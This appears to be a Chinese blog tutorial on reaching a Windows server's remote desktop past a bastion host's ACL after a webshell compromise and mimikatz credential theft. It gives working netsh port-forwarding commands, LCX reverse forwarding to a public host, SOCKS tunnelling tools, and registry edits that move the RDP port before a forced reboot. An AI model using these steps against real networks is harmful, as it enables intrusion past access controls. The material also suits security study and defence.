通过堡垒机rdp 黑屏_如何绕过堡垒机远程登录

本文介绍了在无法直接通过堡垒机访问3389端口的场景下,如何利用netsh命令、LCX、内网穿透工具(如Ngrok、frp)以及修改Windows远程桌面端口的方法,绕过ACL限制远程登录到目标win服务器。
摘要由CSDN通过智能技术生成

假设一个场景: 在Webshell中执行mimikatz获取到win用户密码,并且本地查看端口3389是开放的,从当前攻击跳板机无法远程到目标机器。但是因为某个特定需求,一定要远程登录到这台win服务器,这时该怎么办呢?

首先我们先分析一下这个场景,端口开放却无法连接,最有可能的情况,就是目标网段通过ACL控制,只允许通过堡垒机登录。大多数堡垒机部署时,为了不改变现有的网络拓扑结构,考虑采用旁路部署的方案,通过ACL策略限制用户访问特定端口。

那么这个问题,我们就可以用另一种方式来描述:目标服务器远程端口受到ACL策略访问限制,但其他端口没有限制,那么,最简单的解决方式就可以通过端口转发来绕过。

1、使用netsh命令进行端口转发

Windows自带的netshnetsh实现端口转发,监听12345端口,转发到本地3389端口,可绕过访问策略限制。

#A、3389端口转发到12345端口

netsh interface portproxy add v4tov4 listenaddress=192.168.126.32 listenport=12345 connectaddress=192.168.126.32 connectport=3389

#B、查看配置好的端口映射清单

C:\Windows\system32>netsh interface portproxy show v4tov4

侦听 ipv4: 连接到 ipv4:

地址 端口 地址 端口

--------------- ---------- --------------- ----------

192.168.126.32 12345 192.168.126.32 3389

这样一来,通过攻击机跳板机直接远程目标机器的12345端口,就可以实现远程登录。

2、LCX 端口转发

在目标机器上执行:lcx.exe -slave 公网ip 51 内网ip 3389

在公网的机器执行:Lcx.exe –listen 51 3340

本地机器上连接 127.0.0.1:3340,即可连接上目标机器的3389。

3、内网穿透工具

SOCKS代理,如Ngrok、frp、EW、reGeorg、sSocks等

通过利用SOCKS协议,结合Proxifier使用,可实现mstsc登录目标主机。

4、修改Windows远程桌面端口

通过修改Windows默认远程桌面端口,从而绕过ACL策略访问限制。

修改注册表,命令如下:

REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp" /v "PortNumber" /t REG_DWORD /d 12345/f

REG ADD "HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v "PortNumber" /t REG_DWORD /d 12345 /f

强制重启目标服务器后,注册表生效。

shutdown -r -t 0

此时,就可以远程目标服务器的12345登录。

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值